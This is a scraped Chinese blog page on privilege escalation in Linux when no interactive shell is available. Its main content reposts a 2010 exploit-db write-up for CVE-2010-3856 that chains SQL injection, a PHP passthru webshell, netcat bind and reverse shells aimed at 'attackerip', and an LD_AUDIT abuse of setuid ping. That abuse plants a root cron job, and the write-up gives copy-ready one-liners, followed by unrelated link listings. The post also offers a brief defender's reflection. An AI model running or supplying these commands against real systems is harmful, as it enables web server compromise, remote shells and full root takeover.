houwenhui
houwenhui

linux非交互环境下本地提权思路与反思 linux localroot exploit

在iptables限制非常严格的时候,无法走icmp udp tcp的bind shell或connect back shell,又需要本地提权,root了之后关闭iptables,看看能否绕过访问控制手段(当然了,如果别人是硬件的防火墙,下文解决不了问题)。在这一场景下,可以考虑参考下文的非交互式本地提权的方法,或许还有其他linux localroot exploit也能实现,实战出真知。



另外有些时候不一定非得root的,nobody,非交互也能做非常多的事。



作为防御一方,面对这种场景,我们是否得反思



1、防御手段要与被防御系统分离,即使成功root了,依然难以快速渗透



2、我们对localroot是否有足够的事前的免疫能力,事中的发现能力及事后的定损取证能力?




Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root



# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root


# Date:   24-10-2010


# Author:   jmit


# Mail:   fhausberger[at]gmail[dot]com


# Tested on:   Debian 5.0.6


# CVE:   CVE-2010-3856



--------------


| DISCLAIMER |


--------------



# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE


# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR


# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF


# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS


# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN


# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)


# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE


# POSSIBILITY OF SUCH DAMAGE.



---------


| ABOUT |


---------



Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln).


See (http://www.exploit-db.com/exploits/15304/). Should work on other linux


distros too.



--------------


| BACKGROUND |


--------------



Typically it isn't possible to use a suidshell or modify /etc/passwd directly after


webshell access (user nobody) to gain root access. But with the DSO vuln we can


launch commands as root and we can create a socket and connect to the user or setup


a bindshell.



-----------


| EXPLOIT |


-----------



After you have found a SQL-Injection vuln you can create a php backdoor. This is typically


possible with select into dumpfile/outfile statement. The values are a simple


<? passthru($_GET['c']); ?> backdoor.



---


DROP TABLE IF EXISTS `fm`;


CREATE TABLE `fm` (


`fm` longblob


) TYPE=MyISAM;


insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);


select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php';


drop table fm;


flush logs;


---



Now you can connect to the server and create a connection with telnet, nc, write


binary with perl -e ' print "\x41\x42\x43\x44"', echo -en '\x41\x42\x43\x44', ...


If direct shell access isn't possible you can use phpcode to create your own


binary with php fwrite:



---


<?php $File = "/tmp/nc";


$Handle = fopen($File, 'w');


$Data = "\x41\x42\x43\x44";


fwrite($Handle, $Data);


fclose($Handle); ?>


---



Now use



Bind-Shell: http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash


Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash



in your webbrowser and connect to your shell



$ nc victimip 9999


id


uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)



---



Now lets exploit the DSO vuln. You need umask 0 for correct


rw-rw-rw creation of exploit /etc/cron.d/exploit



$ umask 0



This is the shellscript for the cron.d entry.



Bind-Shell: $ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh


Reverse-Shell: $ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh



Now make your shellscript executable for cron:



$ chmod u+x /tmp/exploit.sh



Create rw-rw-rw file in cron directory using the setuid ping program:



$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping



Launch every minute a suid root shell



$ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit



Now you have a root shell every minute.



$ nc attackerip 79


id


uid=0(root) gid=0(root) groups=0(root)



-------------------


| EXPLOIT oneline |


-------------------



echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit



$ nc attackerip 79


id


uid=0(root) gid=0(root) groups=0(root)



------------------------------


| EXPLOIT from webshell only |


------------------------------



http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh


http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh


http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping


http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit



$ nc attackerip 79


id


uid=0(root) gid=0(root) groups=0(root)



---------------------------------


| EXPLOIT from webshell oneline |


---------------------------------



http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit



$ nc attackerip 79


id


uid=0(root) gid=0(root) groups=0(root)



---------


| IDEAS |


---------



Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs.


Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over.© Offensive Security 2010



摘自红色黑客联盟(www.7747.net) 原文:http://www.7747.net/Article/201101/81973.html

你可能感兴趣的:(linux,职场,休闲,exploit)

  • Linux系统配置(应用程序) 1风天云月 Linuxlinux应用程序编译安装rpmhttp
    目录前言一、应用程序概述1、命令与程序的关系2、程序的组成3、软件包封装类型二、RPM1、RPM概述2、RPM用法三、编译安装1、解包2、配置3、编译4、安装5、启用httpd服务结语前言在Linux中的应用程序被视为将软件包安装到系统中后产生的各种文档,其中包括可执行文件、配置文件、用户手册等内容,这些文档被组织为一个有机的整体,为用户提供特定的功能,因此对于“安装软件包”与“安装应用程序”这两
  • 恩小希美食成长日记之118:“摘星女神”王亚平归来,她的婚姻,治愈了多少职场女性的痛 恩小希
    上周最为热闹的消息,无疑是神舟13号的三位航天英雄回来了.其中,最为瞩目的就是王亚平.她是我国首位进行太空行走的女航天员,也是为自己小女儿“摘星星的妈妈”。作为最受关注的职场妈妈,王亚平之所以能够成就这样一番事业,跟背后默默支持她的丈夫--赵鹏分不开。01王亚平1980年出生于山东烟台。父母都是地地道道的农民。王亚平这个姑娘从小体质好,一直练习长跑。高中时,空军来家乡招收女飞行员,作为体育班里唯一
  • 包含日志获取webshell 陈望_ning
    日志文件关闭:Apache目录下的httpd.conf文件#ErrorLog"logs/error.log"#CustomLog"logs/access.log"common加#号为注释不产生日志文件如果去掉#将会在Apache/logs/目录下产生日志文件linux:access_logerror_logwindows:access.logerror.logaccess_log每一行记录了一次网
  • Android 应用权限管理详解
    文章目录1.权限类型2.权限请求机制3.权限组和分级4.权限管理的演进5.权限监控和SELinux强制访问控制6.应用权限审核和GooglePlayProtect7.开发者最佳实践8.用户权限管理9.Android应用沙箱模型10.ScopedStorage(分区存储)11.背景位置权限(BackgroundLocationAccess)12.权限回收和自动清理13.权限请求的用户体验设计14.G
  • centos7安装配置 Anaconda3
    Anaconda是一个用于科学计算的Python发行版,Anaconda于Python,相当于centos于linux。下载[root@testsrc]#mwgethttps://mirrors.tuna.tsinghua.edu.cn/anaconda/archive/Anaconda3-5.2.0-Linux-x86_64.shBegintodownload:Anaconda3-5.2.0-L
  • PDF转Markdown - Python 实现方案与代码 Eiceblue PythonPythonPDFpdfpython开发语言vscode
    PDF作为广泛使用的文档格式,转换为轻量级标记语言Markdown后,可无缝集成到技术文档、博客平台和版本控制系统中,提高内容的可编辑性和可访问性。本文将详细介绍如何使用国产Spire.PDFforPython库将PDF文档转换为Markdown格式。技术优势:精准保留原始文档结构(段落/列表/表格)完整提取文本和图像内容无需Adobe依赖的纯Python实现支持Linux/Windows/mac
  • 在Windows11上安装Linux操作系统的几种技术方案 yuanpan linux运维服务器
    在Windows11上安装Linux主要有以下几种技术方案,每种方案适用于不同的需求场景:1.WindowsSubsystemforLinux(WSL)适用场景:开发、命令行工具、轻量级Linux环境支持发行版:Ubuntu、Debian、KaliLinux、Fedora等优点:轻量级:无需虚拟机,直接在Windows上运行Linux命令行环境。无缝集成:可访问Windows文件系统,支持VSCo
  • Claude Code 超详细完整指南(2025最新版) 笙囧同学 python
    终端AI编程助手|高频使用点+生态工具+完整命令参考+最新MCP配置目录快速开始(5分钟上手)详细安装指南系统要求Windows安装(WSL方案)macOS安装Linux安装安装验证配置与认证首次认证环境变量配置代理配置⚡基础命令详解启动命令会话管理文件操作Think模式完全指南MCP服务器配置详解MCP基础概念添加MCP服务器10个必备MCP服务器MCP故障排除记忆系统详解高级使用技巧成本控制策
  • 如何在 Ubuntu 24.04 或 22.04 Linux 上安装和运行 Redis 服务器 山岚的运维笔记 Linux运维及使用linux服务器ubunturedis数据库
    Redis(RemoteDictionaryServer,远程字典服务器)是一种内存数据结构存储,通常用作NoSQL数据库、缓存和消息代理。它是开源的,因此用户可以免费安装,无需支付任何费用。Redis旨在为需要快速数据访问和低延迟的应用程序提供速度和效率。Redis支持多种数据类型,包括字符串(Strings)、列表(Lists)、集合(Sets)、哈希(Hashes)、有序集合(SortedS
  • Linux中Samba服务器安装与配置文件 長樂.- linux运维服务器
    Samba简述27zkqsamba是一个基于TCP/IP协议的开源软件套件,可以在Linux、Windows、macOS等操作系统上运行。它允许不同操作系统的计算机之间实现文件和打印机共享。samba提供了一个服务,使得Windows操作系统可以像访问本地文件一样访问Linux、Mac等操作系统上的共享文件。实现跨平台的文件共享,提高办公环境的效率和便利性。samba也支持Windows网络邻居协
  • 38岁,男,月薪3500:受害者思维,正在透支你的人生 阿聊不见了
    大家好,我是阿聊。前段时间回老家的时候,碰到一个以前的邻居。这位邻居,曾经一度是妈妈口中的“别人家的孩子”。在大学生还没泛滥的时候,考上了大学,毕业后听从家里安排,回到小县城,进了一家事业单位。谁知,工作后,他的人生仿佛突然就开始走起了下坡路。工作多年,岗位就没挪动过,近二十年的职场生涯,甚至只被提拔了一次,如今38岁了,月薪3500,且涨薪无望。婚姻也不顺利,30岁左右成婚,婚后不到3年,妻子跟
  • ubuntu qt环境下出现No suitable kits found解决方案
    1.清理QtCreator缓存QtCreator会缓存项目配置、索引等数据,可能导致某些异常。清理方法:(1)删除QtCreator配置目录bashrm-rf~/.config/QtProject/(Ubuntu/Linux)或Windows:cmdrmdir/s/q"%APPDATA%\QtProject"(2)清除QtCreator的编译缓存bashrm-rf~/.cache/QtProjec
  • 如何在 Ubuntu 24.04 或 22.04 Linux 上安装和使用 NoMachine 山岚的运维笔记 Linux运维及使用linuxubuntu运维nomachine远程连接
    NoMachine是一款适用于Linux(Ubuntu)及其他支持的操作系统的远程桌面应用程序,允许用户通过本地或远程系统从世界任何地方控制计算机。它可以在低带宽连接下工作,被专业人士和家庭用户广泛使用。NoMachine的主要功能高性能远程访问跨平台兼容性易于使用,因为用户界面友好提供强大的加密协议,如SSH、SSL及其他安全标准支持远程文件传输和打印服务允许从远程计算机进行音频和视频流媒体传输
  • 微信公众号写作:如何通过文字变现? 氧惠爱高省
    微信公众号已成为许多人分享知识、表达观点的重要平台。随着自媒体的发展,越来越多的人开始关注微信公众号上写文章如何挣钱的问题。本文将详细探讨微信公众号写作的盈利模式,帮助广大写作者实现文字变现的梦想。公众号流量主就找善士导师(shanshi2024)公众号:「善士笔记」主理人,《我的亲身经历,四个月公众号流量主从0到日入过万!》公司旗下管理800+公众号矩阵账号。代表案例如:爸妈领域、职场道道、国学
  • 月薪10000的人过着怎样的生活? 觉得不是很ok
    月薪10000对于初入职场的人来说是个不错的数字但现实中,月薪过万的职场人到底过着什么样的生活呢?我们不妨来算一笔账!下来是申请原创要求的三百字,头条哥p图到凌晨两点我容易吗容易吗容易吗容易吗容易吗容易吗易吗容易吗不容易接下来是申请原创要求的三百字,头条哥p图到凌晨两点我容易吗容易吗容易吗容易吗容易吗容易吗容易吗容易吗不容易接下来是申请原创要求的三百字,头条哥p图到凌晨两点我容易吗容易吗容易吗容易
  • linux实战--日志管理
    简介日志文件重要的信息系统文件,及了许多重要的系统事件,包括用户的登录信息,系统的启动信息,系统的安全信息,邮寄相关信息,各种服务相关的信息。日志对安全也很重要。每天记录系统发生的各种事情,通过日志检查错误发生的原因或受到攻击时攻击者留下的痕迹。总的来说,日志是记录重大事件的文件。处理日志的工具rsyslog系统日志管理专职管理日志的工具,它产生各种信息文件,主要存放在/var/loglogrot
  • 冬游颐和园简易攻略 和佛陀去赏花
    持续记录431天(2019.2.8)阅读打卡第212天:《穷查理宝典》1394-1461。朗诵记录第213天:今天是朗诵的第32周第5天,日常绕口令练习《喇嘛和哑巴》,《论语•述而第七》(二)七点四十醒来,老妈做些早餐,饭毕,我们祖孙三人九点出门,今天计划颐和园。颐和园在最初建造的时候就是为了祝寿所用,作为皇家园林,在规划上颐和园共分为三个区域:生活区(佛香阁),行政区(仁寿堂),游玩休闲区(昆明
  • 王心傲:如何用一句话,让对方自乱阵脚,自取灭亡 王心傲
    我曾经无数次讲过,我们想要真刀真枪的和一个人战斗,那结果无非是两败俱伤,而且输赢犹未可知。图片发自App就好比在职场里,有人说你坏话;就好比生活里,有人跟你争夺女友等等,你若是因为他们恶意中伤你,也明显的对着干,那么很可能吃苦头,而且难以解决问题。其实,对于这种情况,最好的做法是:影响。影响到他们自乱阵脚,自取灭亡。这个呢也是我今天要给你讲的,通过打乱对方的【潜意识习惯】,从而打乱对方的节奏,让对
  • 小牛想要进大厂,距离拿百万高薪,进入AI行业你还缺哪些? TsingtaoAI 人工智能
    本文由小文聊AI原创,有需要的可转发分享对于很多打工人来说,想要拿百万年薪仿佛是天方夜谭,但其实了解AI行业的从业者都知道,有了核心求职能力,以及对职场的认知,再加上对AI技术资源的掌握,进入到一些互联网大厂后,拿到百万年薪不是梦。但对于很多小牛来说,如何能够进入大厂,什么样的人才才能够进入大厂,脑袋里都是空白。那么,究竟什么样的人才具有小牛的潜质呢?来看贪心科技涨薪100%计划-AI职业自由,包
  • 复盘:视听说3、4单元,精读4单元 任贤芳
    Part11,从本单元中我学到的最重要的理念(精读和视听说分别总结)视听说3:休闲时间去做自己想做的事情,度过一个让自己开心而又快乐的时光,比如健美操、烧烤、野餐、瑜伽、更刺激的还有蹦极、攀岩、卡丁车……虽然疫情封闭,但我们仍旧可以在校园中寻找快乐,比如去拍照,一起野餐,玩游戏,封闭的校园封不住我们的快乐与激情,封不住我们的青春快乐。视听说4:聚光灯下生活一般是指名人或者明星以及对社会有较大影响的
  • Windows系统第一次运行C语言程序,环境配置,软件安装等遇到的坑及解决方法 灬爱码士灬 windowsc语言开发语言
    明确需要编辑器和编译器,并选择自己要用什么(我选的编辑器是VSCode:VisualStudioCode;编译器是gcc)下载VSCode并配置环境变量(这里没啥问题),安装C/C++的拓展安装Cygwin,用来在Windows操作系统上模拟Unix/Linux环境(Cygwin官网:https://www.cygwin.com/。)安装过程中镜像可以选择https://mirrors.aliyu
  • 2025 最强 Agent 智能体 学习笔记 (71) 一刀7段 学习笔记人工智能
    Agent智能体的系统学习与职业发展核心内容概览本集是《2025最强Agent智能体全套教程》的第72集,聚焦Agent智能体领域的系统学习方法与职业发展路径,系统梳理了从入门到专家的能力体系、关键学习资源、职业方向选择及行业发展机遇。内容结合技术趋势与职场需求,为不同背景的学习者(学生、开发者、转行人士)提供清晰的成长蓝图,帮助其在Agent智能体领域高效成长,实现职业目标。系统学习的能力体系与
  • 一篇教你学会Git 编程界的彭于晏qaq javaGITgit
    从安装到高级使用(2025最新版)引言:为什么Git是开发者必备技能Git(GlobalInformationTracker)作为最流行的分布式版本控制系统,由Linux之父LinusTorvalds于2005年创建,现已成为软件开发的基础设施。与传统集中式版本控制系统(如SVN)相比,Git具有三大核心优势:分布式架构:每个开发者本地都有完整仓库副本,支持离线工作高效分支管理:创建和切换分支几乎
  • 《婚后,诱她上瘾》时也霍铭川(完结篇)全文免费阅读【笔趣阁】 海边书楼
    《婚后,诱她上瘾》时也霍铭川(完结篇)全文免费阅读【笔趣阁】主角:时也霍铭川简介:职场小透明,年会上喝醉,敲开了总裁的房门。“霍总,听说能睡到你的女人,上辈子是拯救了银河系?关注微信公众号【海边书楼】去回个书号【10】,即可阅读【婚后,诱她上瘾】小说全文!第1章我把上司给睡了,就在年会结束的那天晚上。醒来后,看着上司裸露的八块腹肌,我吞了吞口水:“我……要失业了吗?”上司冷漠的眼神看过来:“结婚,
  • 基本服务 FTP & SMB 会飞的灰大狼 Centos7linux
    基本服务FTP&SMB前言:FTP简称为文件传输协议前面说的他可以做到备份的功能那么它可以做到文件传输的过程smb我们简单来说共享文件夹‍NFSNFS(NetworkFileSystem,网络文件系统)是一种分布式文件系统协议,允许不同计算机之间通过网络共享文件和目录,使远程文件系统像本地文件系统一样被访问。它最初由SunMicrosystems开发,现在已成为UNIX/Linux系统中常用的网络
  • Ubuntu lamp 会飞的灰大狼 linuxubuntu
    Ubuntulamp前言在Ubuntu安装lamp架构我们了解到lamp是完整的架构我们前面了解到了集合了Linux系统apacheMySQL和PHP语言的完整架构我们前面说了Centos7中编译安装lamp那么我们去说一下在Ubuntu中安装‍‍安装apache2‍apt直接安装apache2apt-yinstallapache2‍启动apache2systemctlstartapache2#测
  • 2023-04-28《举杯畅饮的姐姐们》定档0428,三个女人一台戏,铁三角乘风破浪 娱娱鱼
    都市情感治愈短剧《举杯畅饮的姐姐们》定档0428。曾用名《开怀畅饮的姐姐们》。据说改编自韩剧《酒鬼都市的女人们》。金莎饰演的瞿洋,刘芸饰演的郭欣婷,双女主设定很带感。她们曾经在综艺《乘风破浪的姐姐2》中有过合作,这次的二度合作令人期待。加上姜嫄饰演的吴沛沛,组成铁三角闺蜜团。都说三个女人一台戏,更何况剧中有将近十个女人。该剧以中女时代为背景,以酒元素为契机,关注当代女性在职场和生活中的境遇,将她们
  • Linux文件权限与进程管理解析 雨季西柚 linux
    控制对文件的访问1。什么是文件系统权限?它是如何工作的?如何查看文件的权限?答:文件系统权限就是规定谁能对文件/文件夹做什么(比如看、改、删)的规则。简单说,就是分"所有者、所属组、其他人"三类,给每类分配"读、写、执行"三种权限。操作时系统先看你属于哪类,再查有没有对应权限,有就允许,没有就拦着。查看方式:Linux/mac:终端输ls-l文件名,看开头的rwxr--r--这类字符(3个一组,对
  • 年底了,为什么还有很多人选择裸辞?他们心里怎么想的? 无顾有长风
    距离今年春节过年仅有二十来天,各大公司都在忙着做年底的结算,该总结的总结,该开年会的开年会,有一些其他的想法都会等着明年开春再说,毕竟在春节来临之际,其他的事情都要让路。每年的三四月份号称“金三银四”,职场上跳槽和招聘都很频繁,届时换工作有更好的选择和更多的机会。一般情况下,很少人会选择裸辞,特别是在年底之前裸辞,除非有特殊的原因。最近看到很多人在网上发帖说自己刚刚裸辞,到底是啥原因让他们逆常规而
  • 职场圆梦手册—1月份总结回顾篇 陆游学苑
    在2020年1月1日给自己制定了自己年度个人规划,从圆方规划图的八个维度:个人成长、自我实现、职业发展、财务、朋友及重要他人,家庭、健康、休闲娱乐来做的,见自己的文章《2020年度个人规划—培训陆游》。本来是打算以月度来进行回顾的,不过这个春节因为众所周知的原因,没有进行回顾,正好借着今天这个时间,来对自己1月份的完成情况进行一个回顾,后期还是要坚持进行月度和周度的回顾,不断看自己是否偏离了自己的
  • Java常用排序算法/程序员必须掌握的8大排序算法 cugfy java
    分类: 1)插入排序(直接插入排序、希尔排序) 2)交换排序(冒泡排序、快速排序) 3)选择排序(直接选择排序、堆排序) 4)归并排序 5)分配排序(基数排序) 所需辅助空间最多:归并排序 所需辅助空间最少:堆排序 平均速度最快:快速排序 不稳定:快速排序,希尔排序,堆排序。 先来看看8种排序之间的关系:   1.直接插入排序 (1
  • 【Spark102】Spark存储模块BlockManager剖析 bit1129 manager
    Spark围绕着BlockManager构建了存储模块,包括RDD,Shuffle,Broadcast的存储都使用了BlockManager。而BlockManager在实现上是一个针对每个应用的Master/Executor结构,即Driver上BlockManager充当了Master角色,而各个Slave上(具体到应用范围,就是Executor)的BlockManager充当了Slave角色
  • linux 查看端口被占用情况详解 daizj linux端口占用netstatlsof
    经常在启动一个程序会碰到端口被占用,这里讲一下怎么查看端口是否被占用,及哪个程序占用,怎么Kill掉已占用端口的程序   1、lsof -i:port port为端口号   [root@slave /data/spark-1.4.0-bin-cdh4]# lsof -i:8080 COMMAND   PID USER   FD   TY
  • Hosts文件使用 周凡杨 hostslocahost
         一切都要从localhost说起,经常在tomcat容器起动后,访问页面时输入http://localhost:8088/index.jsp,大家都知道localhost代表本机地址,如果本机IP是10.10.134.21,那就相当于http://10.10.134.21:8088/index.jsp,有时候也会看到http: 127.0.0.1:
  • java excel工具 g21121 Java excel
    直接上代码,一看就懂,利用的是jxl: import java.io.File; import java.io.IOException; import jxl.Cell; import jxl.Sheet; import jxl.Workbook; import jxl.read.biff.BiffException; import jxl.write.Label; import
  • web报表工具finereport常用函数的用法总结(数组函数) 老A不折腾 finereportweb报表函数总结
    ADD2ARRAY ADDARRAY(array,insertArray, start):在数组第start个位置插入insertArray中的所有元素,再返回该数组。 示例: ADDARRAY([3,4, 1, 5, 7], [23, 43, 22], 3)返回[3, 4, 23, 43, 22, 1, 5, 7]. ADDARRAY([3,4, 1, 5, 7], "测试&q
  • 游戏服务器网络带宽负载计算 墙头上一根草 服务器
    家庭所安装的4M,8M宽带。其中M是指,Mbits/S 其中要提前说明的是: 8bits = 1Byte 即8位等于1字节。我们硬盘大小50G。意思是50*1024M字节,约为 50000多字节。但是网宽是以“位”为单位的,所以,8Mbits就是1M字节。是容积体积的单位。 8Mbits/s后面的S是秒。8Mbits/s意思是 每秒8M位,即每秒1M字节。 我是在计算我们网络流量时想到的
  • 我的spring学习笔记2-IoC(反向控制 依赖注入) aijuans Spring 3 系列
    IoC(反向控制 依赖注入)这是Spring提出来了,这也是Spring一大特色。这里我不用多说,我们看Spring教程就可以了解。当然我们不用Spring也可以用IoC,下面我将介绍不用Spring的IoC。 IoC不是框架,她是java的技术,如今大多数轻量级的容器都会用到IoC技术。这里我就用一个例子来说明: 如:程序中有 Mysql.calss 、Oracle.class 、SqlSe
  • 高性能mysql 之 选择存储引擎(一) annan211 mysqlInnoDBMySQL引擎存储引擎
    1 没有特殊情况,应尽可能使用InnoDB存储引擎。   原因:InnoDB 和 MYIsAM 是mysql 最常用、使用最普遍的存储引擎。其中InnoDB是最重要、最广泛的存储引擎。她   被设计用来处理大量的短期事务。短期事务大部分情况下是正常提交的,很少有回滚的情况。InnoDB的性能和自动崩溃   恢复特性使得她在非事务型存储的需求中也非常流行,除非有非常
  • UDP网络编程 百合不是茶 UDP编程局域网组播
      UDP是基于无连接的,不可靠的传输   与TCP/IP相反       UDP实现私聊,发送方式客户端,接受方式服务器 package netUDP_sc; import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.Ine
  • JQuery对象的val()方法执行结果分析 bijian1013 JavaScriptjsjquery
            JavaScript中,如果id对应的标签不存在(同理JAVA中,如果对象不存在),则调用它的方法会报错或抛异常。在实际开发中,发现JQuery在id对应的标签不存在时,调其val()方法不会报错,结果是undefined。        
  • http请求测试实例(采用json-lib解析) bijian1013 jsonhttp
            由于fastjson只支持JDK1.5版本,因些对于JDK1.4的项目,可以采用json-lib来解析JSON数据。如下是http请求的另外一种写法,仅供参考。 package com; import java.util.HashMap; import java.util.Map; import
  • 【RPC框架Hessian四】Hessian与Spring集成 bit1129 hessian
    在【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中介绍了基于Hessian的RPC服务的实现步骤,在那里使用Hessian提供的API完成基于Hessian的RPC服务开发和客户端调用,本文使用Spring对Hessian的集成来实现Hessian的RPC调用。   定义模型、接口和服务器端代码 |---Model    &nb
  • 【Mahout三】基于Mahout CBayes算法的20newsgroup流程分析 bit1129 Mahout
    1.Mahout环境搭建  1.下载Mahout http://mirror.bit.edu.cn/apache/mahout/0.10.0/mahout-distribution-0.10.0.tar.gz    2.解压Mahout  3. 配置环境变量 vim /etc/profile export HADOOP_HOME=/home
  • nginx负载tomcat遇非80时的转发问题 ronin47
      nginx负载后端容器是tomcat(其它容器如WAS,JBOSS暂没发现这个问题)非80端口,遇到跳转异常问题。解决的思路是:$host:port        详细如下:    该问题是最先发现的,由于之前对nginx不是特别的熟悉所以该问题是个入门级别的: ? 1 2 3 4 5
  • java-17-在一个字符串中找到第一个只出现一次的字符 bylijinnan java
    public class FirstShowOnlyOnceElement { /**Q17.在一个字符串中找到第一个只出现一次的字符。如输入abaccdeff,则输出b * 1.int[] count:count[i]表示i对应字符出现的次数 * 2.将26个英文字母映射:a-z <--> 0-25 * 3.假设全部字母都是小写 */ pu
  • mongoDB 复制集 开窍的石头 mongodb
    mongo的复制集就像mysql的主从数据库,当你往其中的主复制集(primary)写数据的时候,副复制集(secondary)会自动同步主复制集(Primary)的数据,当主复制集挂掉以后其中的一个副复制集会自动成为主复制集。提供服务器的可用性。和防止当机问题             mo
  • [宇宙与天文]宇宙时代的经济学 comsci 经济
        宇宙尺度的交通工具一般都体型巨大,造价高昂。。。。。      在宇宙中进行航行,近程采用反作用力类型的发动机,需要消耗少量矿石燃料,中远程航行要采用量子或者聚变反应堆发动机,进行超空间跳跃,要消耗大量高纯度水晶体能源      以目前地球上国家的经济发展水平来讲,
  • Git忽略文件 Cwind git
         有很多文件不必使用git管理。例如Eclipse或其他IDE生成的项目文件,编译生成的各种目标或临时文件等。使用git status时,会在Untracked files里面看到这些文件列表,在一次需要添加的文件比较多时(使用git add . / git add -u),会把这些所有的未跟踪文件添加进索引。 ==== ==== ==== 一些牢骚
  • MySQL连接数据库的必须配置 dashuaifu mysql连接数据库配置
    MySQL连接数据库的必须配置   1.driverClass:com.mysql.jdbc.Driver   2.jdbcUrl:jdbc:mysql://localhost:3306/dbname   3.user:username   4.password:password   其中1是驱动名;2是url,这里的‘dbna
  • 一生要养成的60个习惯 dcj3sjt126com 习惯
    一生要养成的60个习惯 第1篇 让你更受大家欢迎的习惯 1 守时,不准时赴约,让别人等,会失去很多机会。 如何做到: ①该起床时就起床, ②养成任何事情都提前15分钟的习惯。 ③带本可以随时阅读的书,如果早了就拿出来读读。 ④有条理,生活没条理最容易耽误时间。 ⑤提前计划:将重要和不重要的事情岔开。 ⑥今天就准备好明天要穿的衣服。 ⑦按时睡觉,这会让按时起床更容易。 2 注重
  • [介绍]Yii 是什么 dcj3sjt126com PHPyii2
    Yii 是一个高性能,基于组件的 PHP 框架,用于快速开发现代 Web 应用程序。名字 Yii (读作 易)在中文里有“极致简单与不断演变”两重含义,也可看作 Yes It Is! 的缩写。 Yii 最适合做什么? Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应
  • Linux SSH常用总结 eksliang linux sshSSHD
    转载请出自出处:http://eksliang.iteye.com/blog/2186931 一、连接到远程主机   格式: ssh name@remoteserver 例如: ssh [email protected]   二、连接到远程主机指定的端口   格式: ssh name@remoteserver -p 22 例如: ssh i
  • 快速上传头像到服务端工具类FaceUtil gundumw100 android
    快速迭代用 import java.io.DataOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; import java.io.IOExceptio
  • jQuery入门之怎么使用 ini JavaScripthtmljqueryWebcss
    jQuery的强大我何问起(个人主页:hovertree.com)就不用多说了,那么怎么使用jQuery呢?   首先,下载jquery。下载地址:http://hovertree.com/hvtart/bjae/b8627323101a4994.htm,一个是压缩版本,一个是未压缩版本,如果在开发测试阶段,可以使用未压缩版本,实际应用一般使用压缩版本(min)。然后就在页面上引用。
  • 带filter的hbase查询优化 kane_xie 查询优化hbaseRandomRowFilter
    问题描述 hbase scan数据缓慢,server端出现LeaseException。hbase写入缓慢。   问题原因 直接原因是: hbase client端每次和regionserver交互的时候,都会在服务器端生成一个Lease,Lease的有效期由参数hbase.regionserver.lease.period确定。如果hbase scan需
  • java设计模式-单例模式 men4661273 java单例枚举反射IOC
             单例模式1,饿汉模式 //饿汉式单例类.在类初始化时,已经自行实例化 public class Singleton1 { //私有的默认构造函数 private Singleton1() {} //已经自行实例化 private static final Singleton1 singl
  • mongodb 查询某一天所有信息的3种方法,根据日期查询 qiaolevip 每天进步一点点学习永无止境mongodb纵观千象
    // mongodb的查询真让人难以琢磨,就查询单天信息,都需要花费一番功夫才行。 // 第一种方式: coll.aggregate([ {$project:{sendDate: {$substr: ['$sendTime', 0, 10]}, sendTime: 1, content:1}}, {$match:{sendDate: '2015-
  • 二维数组转换成JSON tangqi609567707 java二维数组json
    原文出处:http://blog.csdn.net/springsen/article/details/7833596 public class Demo {     public static void main(String[] args) {        String[][] blogL
  • erlang supervisor wudixiaotie erlang
    定义supervisor时,如果是监控celuesimple_one_for_one则删除children的时候就用supervisor:terminate_child (SupModuleName, ChildPid),如果shutdown策略选择的是brutal_kill,那么supervisor会调用exit(ChildPid, kill),这样的话如果Child的behavior是gen_
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他